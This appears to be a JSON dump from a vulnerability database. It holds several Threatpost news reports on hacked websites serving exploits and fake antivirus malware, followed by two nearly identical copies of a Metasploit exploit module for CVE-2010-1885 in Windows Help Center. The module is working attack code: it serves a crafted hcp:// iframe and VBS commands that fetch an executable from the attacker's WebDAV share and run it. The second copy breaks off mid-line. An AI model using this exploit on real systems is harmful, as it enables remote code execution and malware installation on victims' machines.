[Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three media other sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.\n", "modified": "2013-05-09T20:01:56", "published": "2013-05-07T12:58:12", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:51", "bulletinFamily": "info", "cvelist": ["CVE-2007-5659", "CVE-2009-0927", "CVE-2009-4324"], "description": "[](<https://threatpost.com/main-php-nuke-site-compromised-050710/>)The main site for the PHP-Nuke content management system software has been compromised and is serving malicious iFrame exploits to visitors. \n\nResearchers at [Websense](<http://community.websense.com/blogs/securitylabs/archive/2010/05/07/phpnuke-org-has-been-compromised.aspx>) found that the phpnuke.org site is currently serving several different exploits. The attack uses the common iFrame-redirection technique to hijack users\u2019 browsers and send them off to a malicious site. The code on that site is highly obfuscated and contains exploits for three separate vulnerabilities, two in Internet Explorer and one in Adobe Reader.\n\nThe first attack tries to exploit a four-year-old flaw in Internet Explorer. If that part of the attack works, it downloads a Trojan onto the victim\u2019s machine. The malware then tries to connect to several Web sites, the researchers said. \n\n\n\nThe second attack uses a Java exploit, which ends up with the same infection routine as the first one. \n\nThe third exploit is a PDF exploit \u2014 this actually merges three \nexploits targeting Adobe Reader. First the JavaScript in the HTML page \nchecks if Adobe Reader is exploitable by checking its version number. \nThe version should be between 7 and 7.1.4, 8 and 8.1.7, or 9 and 9.4. \nWhen a vulnerable version is found, the exploit downloads the malicious \nPDF file and as it is loaded by Adobe Reader, the malicious ActionScript \nin the file is executed automatically. The PDF itself contains an \nobfuscated ActionScript that utilizes one of the three different PDF \nexploits it hides. These are [CVE-2009-4324](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324>), \n[CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>), \nand [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>). \nIf it succeeds, the download and installation of **updates.exe** \nhappens in a similar manner to that described earlier.\n\nThe Websense report says that the exploit is still active on the PHP-Nuke site right now. PHP-Nuke originally was an open-source platform, but is now a commercial product. The main site, however, still serves as a resource page for users and developers. \n", "modified": "2018-08-15T12:49:42", "published": "2010-05-07T15:37:38", "id": "THREATPOST:F74B2BA1E612E4169F1938346DB9CC35", "href": "https://threatpost.com/main-php-nuke-site-compromised-050710/73938/", "type": "threatpost", "title": "Main PHP-Nuke Site Compromised", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "bulletinFamily": "info", "cvelist": ["CVE-2006-5820", "CVE-2007-0015", "CVE-2007-5659", "CVE-2007-6250", "CVE-2008-2992", "CVE-2009-0927"], "description": "[](<https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/>)Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.\n\nAccording to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.\n\nThe malicious JavaScript was found on the \u201cCurious George\u201d page that provides content on the popular animation series.\n\nA look at the code on the hijacked site shows malicious activity coming from a third-party .info domain.\n\nThe URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader ([CVE-2008-2992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992>), [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>), and [CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>)), AOL Radio AmpX ([CVE-2007-6250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250>)), AOL SuperBuddy ([CVE-2006-5820](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820>)) and Apple QuickTime ([CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>)).\n\nPurewire said the exploit site is part of a malware campaign that includes tens of similar Web sites hosted off of a handful of common IP addresses.\n\nRead [the Purewire blog for more information](<http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits>) on this attack.\n\nA representative for PBS.org tells me the malicious code has been removed from the site.\n", "modified": "2013-04-17T16:39:50", "published": "2009-09-23T22:41:03", "id": "THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A", "href": "https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/72217/", "type": "threatpost", "title": "PBS Website Compromised, Used to Serve Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:20", "description": "", "published": "2010-06-15T00:00:00", "type": "packetstorm", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-06-15T00:00:00", "id": "PACKETSTORM:90666", "href": "https://packetstormsecurity.com/files/90666/Microsoft-Help-Center-XSS-and-Command-Execution.html", "sourceData": "`## \n# $Id: ms10_xxx_helpctr_xss_cmd_exec.rb 9518 2010-06-15 05:44:29Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Help Center XSS and Command Execution', \n'Description' => %q{ \nHelp and Support Center is the default application provided to access online \ndocumentation for Microsoft Windows. Microsoft supports accessing help documents \ndirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to \nan error in validation of input to hcp:// combined with a local cross site \nscripting vulnerability and a specialized mechanism to launch the XSS trigger, \narbitrary command execution can be achieved. \n \nOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it \ncan be used to launch the exploit automatically. If IE8 and WMP11, either can \nbe used to launch the attack, but both pop dialog boxes asking the user if \nexecution should continue. This exploit detects if non-intrusive mechanisms are \navailable and will use one if possible. In the case of both IE8 and WMP11, the \nexploit defaults to using an iframe on IE8, but is configurable by setting the \nDIALOGMECH option to \"none\" or \"player\". \n}, \n'Author' => \n[ \n'Tavis Ormandy', # Original discovery \n'natron' # Metasploit version \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9518 $', \n'References' => \n[ \n[ 'CVE', '2010-1885' ], \n[ 'OSVDB', '65264' ], \n[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ], \n[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2219475.mspx' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'June 09, 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use.\", \"/\" ]), \nOptString.new( 'DIALOGMECH', [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"]) \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \n# If there is no subdirectory in the request, we need to redirect. \nif (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//) \nif (request.uri == '/') \nsubdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' \nelse \nsubdir = request.uri + '/' \nend \nprint_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\") \nsend_redirect(cli, subdir) \nreturn \nend \n \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nend \n \nend \n \ndef process_get(cli, request) \n \n@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\" \n@url_base = \"http://\" + @my_host \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) \nprint_status \"Sending payload executable to target ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = Msf::Util::EXE.to_win32pe(framework, p.encoded) \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif request.uri.match(/\\.gif$/) \n# \"world's smallest gif\" \ndata = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\" \ndata += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\" \nprint_status \"Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ...\" \nsend_response(cli, data, { 'Content-TYpe' => 'image/gif' } ) \nend \n \n# ASX Request Inbound \nif request.uri.match(/\\.asx$/) \nasx = %Q|<ASX VERSION=\"3.0\"> \n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/> \n<ENTRY> \n<REF href=\"URLBASE/IMGFILE\"/> \n</ENTRY> \n</ASX> \n| \nasx.gsub!(/URLBASE/, @url_base) \nasx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help) \nasx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file) \nprint_status(\"Sending asx file to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, asx, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# iframe request inbound from either WMP or IE7 \nif request.uri.match(/#{@start_help}/) \n \nhelp_html = %Q|<iframe src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">| \n \nrand_vbs = rand_text_alpha(rand(2)+1) + \".vbs\" \ncopy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^ \nvbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false| \nwrite_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}| \nlaunch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul| \nconcat_cmds = \"#{write_vbs}|#{launch_vbs}\" \n \neval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\" \neval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block)) \nhelp_html.gsub!(/COMMANDS/, eval_block) \nprint_status(\"Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, help_html, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# default initial response \njs = %Q| \nvar asx = \"URLBASE/ASXFILE\"; \nvar ifr = \"URLBASE/IFRFILE\"; \n \nfunction launchiframe(src) { \nvar o = document.createElement(\"IFRAME\"); \no.setAttribute(\"width\",\"0\"); \no.setAttribute(\"height\",\"0\"); \no.setAttribute(\"frameborder\",\"0\"); \no.setAttribute(\"src\",src); \ndocument.body.appendChild(o); \n} \n \nif (window.navigator.appName == \"Microsoft Internet Explorer\") { \nvar ua = window.navigator.userAgent; \nvar re = new RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\"); \nre.exec(ua) \nver = parseFloat( RegExp.$1 ); \n \n// if ie8, check WMP version \nif (ver > 7) { \nvar o = document.createElement(\"OBJECT\"); \no.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\"); \no.setAttribute(\"uiMode\", \"invisible\"); \n// if wmp9, go ahead and launch \nif( parseInt(o.versionInfo) < 10 ) { \no.openPlayer(asx); \n// if > wmp9, only launch if user requests \n} else { \nDIALOGMECH \n} \n// if ie7, use iframe \n} else { \nlaunchiframe(ifr); \n} \n} else { \n// if other, try iframe \nlaunchiframe(ifr); \n} \n| \n \nhtml = %Q|<html> \n<head></head><body><script>JAVASCRIPTFU \n</script> \n</body> \n</html> \n| \ncase datastore['DIALOGMECH'] \nwhen \"player\" \nmech = \"o.openPlayer(asx);\" \nwhen \"iframe\" \nmech = \"launchiframe(ifr);\" \nwhen \"none\" \nmech = \"\" \nelse \nmech = \"\" \nend \n \nhtml.gsub!(/JAVASCRIPTFU/, js) \nhtml.gsub!(/DIALOGMECH/, mech) \nhtml.gsub!(/URLBASE/, @url_base) \nhtml.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file) \nhtml.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help) \n \nprint_status(\"Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...\") \n \nheaders = { \n'Content-Type' => 'text/html', \n#'X-UA-Compatible' => 'IE=7' \n} \n \nsend_response(cli, html, headers) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n#'DASL' => '<DAV:sql>', \n#'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nsend_response(cli, '', headers) \nend \n \ndef convert_to_char_code(str) \nreturn str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop \nend \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}\") \nbody = '' \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(path)) \n# Response for the EXE \nprint_status(\"Sending EXE multistatus for #{path} ...\") \n#<lp1:getcontentlength>45056</lp1:getcontentlength> \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag> \n<lp2:executable>F</lp2:executable> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \nelsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i) \nprint_status(\"Sending 404 for #{path} ...\") \nsend_not_found(cli) \nreturn \n \nelsif (path =~ /\\/$/) or (not path.sub('/', '').index('/')) \n# Response for anything else (generally just /) \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nelse \nprint_status(\"Sending 404 for #{path} ...\") \nsend_not_found(cli) \nreturn \nend \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \ndef exploit \n@random_dir = rand_text_alpha(rand(2)+1) \n@asx_file = rand_text_alpha(rand(2)+1) + \".asx\" \n@start_help = rand_text_alpha(rand(2)+1) + \".html\" \n@payload = rand_text_alpha(rand(2)+1) + \".exe\" \n@img_file = rand_text_alpha(rand(2)+1) + \".gif\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nsuper \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/90666/ms10_xxx_helpctr_xss_cmd_exec.rb.txt"}, {"lastseen": "2016-12-05T22:20:11", "description": "", "published": "2010-07-14T00:00:00", "type": "packetstorm", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-07-14T00:00:00", "id": "PACKETSTORM:91768", "href": "https://packetstormsecurity.com/files/91768/Microsoft-Help-Center-XSS-and-Command-Execution.html", "sourceData": "`## \n# $Id: ms10_042_helpctr_xss_cmd_exec.rb 9810 2010-07-13 19:31:40Z hdm $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Help Center XSS and Command Execution', \n'Description' => %q{ \nHelp and Support Center is the default application provided to access online \ndocumentation for Microsoft Windows. Microsoft supports accessing help documents \ndirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to \nan error in validation of input to hcp:// combined with a local cross site \nscripting vulnerability and a specialized mechanism to launch the XSS trigger, \narbitrary command execution can be achieved. \n \nOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it \ncan be used to launch the exploit automatically. If IE8 and WMP11, either can \nbe used to launch the attack, but both pop dialog boxes asking the user if \nexecution should continue. This exploit detects if non-intrusive mechanisms are \navailable and will use one if possible. In the case of both IE8 and WMP11, the \nexploit defaults to using an iframe on IE8, but is configurable by setting the \nDIALOGMECH option to \"none\" or \"player\". \n}, \n'Author' => \n[ \n'Tavis Ormandy', # Original discovery \n'natron' # Metasploit version \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9810 $', \n'References' => \n[ \n[ 'CVE', '2010-1885' ], \n[ 'OSVDB', '65264' ], \n[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ], \n[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2219475.mspx' ], \n[ 'MSB', 'MS10-042'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'Jun 09 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use.\", \"/\" ]), \nOptString.new( 'DIALOGMECH', [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"]) \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \n# If there is no subdirectory in the request, we need to redirect. \nif (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//) \nif (request.uri == '/') \nsubdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' \nelse \nsubdir = request.uri + '/' \nend \nprint_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\") \nsend_redirect(cli, subdir) \nreturn \nend \n \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nend \n \nend \n \ndef process_get(cli, request) \n \n@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\" \n@url_base = \"http://\" + @my_host \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) \nprint_status \"Sending payload executable to target ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = Msf::Util::EXE.to_win32pe(framework, p.encoded) \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif request.uri.match(/\\.gif$/) \n# \"world's smallest gif\" \ndata = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\" \ndata += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\" \nprint_status \"Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ...\" \nsend_response(cli, data, { 'Content-TYpe' => 'image/gif' } ) \nend \n \n# ASX Request Inbound \nif request.uri.match(/\\.asx$/) \nasx = %Q|<ASX VERSION=\"3.0\"> \n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/> \n<ENTRY> \n<REF href=\"URLBASE/IMGFILE\"/> \n</ENTRY> \n</ASX> \n| \nasx.gsub!(/URLBASE/, @url_base) \nasx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help) \nasx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file) \nprint_status(\"Sending asx file to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, asx, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# iframe request inbound from either WMP or IE7 \nif request.uri.match(/#{@start_help}/) \n \nhelp_html = %Q|<iframe src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">| \n \nrand_vbs = rand_text_alpha(rand(2)+1) + \".vbs\" \ncopy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^ \nvbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false| \nwrite_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}| \nlaunch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul| \nconcat_cmds = \"#{write_vbs}|#{launch_vbs}\" \n \neval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\" \neval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block)) \nhelp_html.gsub!(/COMMANDS/, eval_block) \nprint_status(\"Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, help_html, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# default initial response \njs = %Q| \nvar asx = \"URLBASE/ASXFILE\"; \nvar ifr = \"URLBASE/IFRFILE\"; \n \nfunction launchiframe(src) { \nvar o = document.createElement(\"IFRAME\"); \no.setAttribute(\"width\",\"0\"); \no.setAttribute(\"height\",\"0\"); \no.setAttribute(\"frameborder\",\"0\"); \no.setAttribute(\"src\",src); \ndocument.body.appendChild(o); \n} \n \nif (window.navigator.appName == \"Microsoft Internet Explorer\") { \nvar ua = window.navigator.userAgent; \nvar re = new RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\"); \nre.exec(ua) \nver = parseFloat( RegExp.$1 ); \n \n// if ie8, check WMP version \nif (ver > 7) { \nvar o = document.createElement(\"OBJECT\"); \no.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\"); \no.setAttribute(\"uiMode\", \"invisible\"); \n// if wmp9, go ahead and launch \nif( parseInt(o.versionInfo) < 10 ) { \no.openPlayer(asx); \n// if > wmp9, only launch if user requests \n} else { \nDIALOGMECH \n} \n// if ie7, use iframe \n} else { \nlaunchiframe(ifr); \n} \n} else { \n// if other, try iframe \nlaunchiframe(ifr); \n} \n| \n \nhtml = %Q|<html> \n<head></head><body><script>JAVASCRIPTFU \n</script> \n</body> \n</html> \n| \ncase datastore['DIALOGMECH'] \nwhen \"player\" \nmech = 